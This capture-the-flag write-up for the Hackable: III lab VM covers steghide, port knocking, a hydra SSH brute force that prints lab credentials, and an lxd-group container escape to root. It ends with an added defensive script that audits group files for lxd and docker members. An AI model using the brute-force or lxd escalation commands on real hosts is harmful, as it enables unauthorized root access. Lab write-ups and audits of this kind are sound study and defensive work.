Last updated: 15 Apr 24 09:29:14 (UTC)
Write-Up Hackable-III
Hackable-III
By Lawcky 09/01/24
Introduction
Focus on general concepts about CTF
Difficulty : Medium
Additional info:
Name: Hackable: III
Release date: 2 Jun 2021
Author: Elias Sousa
Series: Hackable
|NOTE| we won't copy all the scans here as they would be way too voluminous; if you want to see them, click here
In this write-up
- steghide
- knockd
- hydra
- lxd
Write-UP
the website :
Enumerating
<!-- "Please, jubiscleudo, don't forget to activate the port knocking when exiting your section, and tell the boss not to forget to approve the .jpg file - dev_suport@hackable3.com" -->
also found
and login_page/login.html
when trying the login it opens a white page with this inside the source code
when going to the image link we find an image
Steganography
steghide --extract -sf JESUS.jpg
Port Knocking
we now know that port 65535 is one of the ports that we shall use for the port knocking mentioned above
in the webpages we find 2 other ports,
one in /config/1.txt and the other in a css page, 2.txt
echo MTAwMDA= | base64 -d
= 10000
=4444
in order :
knock 192.168.1.42 10000 4444 65535
then nmap 192.168.1.42 -p22
Bruteforce SSH
let's use the user we know and the wordlist we already had
hydra -l jubiscleudo -P wordlist.txt -t 64 ssh://192.168.1.42 -I
jubiscleudo:onlymy
first flag found
Privilege Escalation
found this in root
found this hidden file in /var/www/html/
those credentials are for the actual hackable_3 user
hackable_3:TrOLLED_3
we see that the user belongs to the lxd group
we can use this to escalate privileges
it had never been launched so first
lxd init dir
then
lxc init ubuntu:16.04 test -c security.privileged=true
lxc config device add test whatever disk source=/ path=/mnt/root recursive=true
lxc start test
lxc exec test bash
cd /mnt/root
done
second flag found
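A defender's follow-up to the lxd step above, as an added example that is not part of the original write-up: since lxd group membership gave root on this box, the script below audits group and passwd databases for accounts in such groups, including accounts that only hold the group as their primary GID. The default group list, the GIDs and the svc_build account are assumptions made for the constructed sample.

```sh
#!/bin/sh
# Added example (not from the write-up): flag accounts in groups that grant
# root-equivalent access through a daemon socket. The default list is an assumption.
RISKY_GROUPS="${RISKY_GROUPS:-lxd docker}"

# audit_risky_groups [GROUP_FILE] [PASSWD_FILE]
# Prints "user:group" for supplementary members (4th field of the group file)
# and for accounts whose primary GID is a risky group (visible in passwd only).
audit_risky_groups() {
    awk -F: -v risky="$RISKY_GROUPS" '
        BEGIN { n = split(risky, r, " "); for (i = 1; i <= n; i++) want[r[i]] = 1 }
        db == "group" && ($1 in want) {
            gid2name[$3] = $1
            m = split($4, members, ",")
            for (i = 1; i <= m; i++) if (members[i] != "") print members[i] ":" $1
        }
        db == "passwd" && ($4 in gid2name) { print $1 ":" gid2name[$4] }
    ' db=group "${1:-/etc/group}" db=passwd "${2:-/etc/passwd}" | sort -u
}

# Constructed sample databases: hackable_3 is the lxd member from the write-up,
# svc_build is a hypothetical account that has lxd as its primary group.
demo_sample() {
    d=$(mktemp -d) || return 1
    printf '%s\n' 'root:x:0:' 'lxd:x:116:hackable_3' 'docker:x:998:' > "$d/group"
    printf '%s\n' 'root:x:0:0::/root:/bin/bash' \
        'jubiscleudo:x:1001:1001::/home/jubiscleudo:/bin/bash' \
        'hackable_3:x:1000:1000::/home/hackable_3:/bin/bash' \
        'svc_build:x:1002:116::/home/svc_build:/bin/sh' > "$d/passwd"
    audit_risky_groups "$d/group" "$d/passwd"
    rm -rf "$d"
}

demo_sample
```

Calling audit_risky_groups with no arguments reads the live /etc/group and /etc/passwd; any account it prints should be treated as having root on that host.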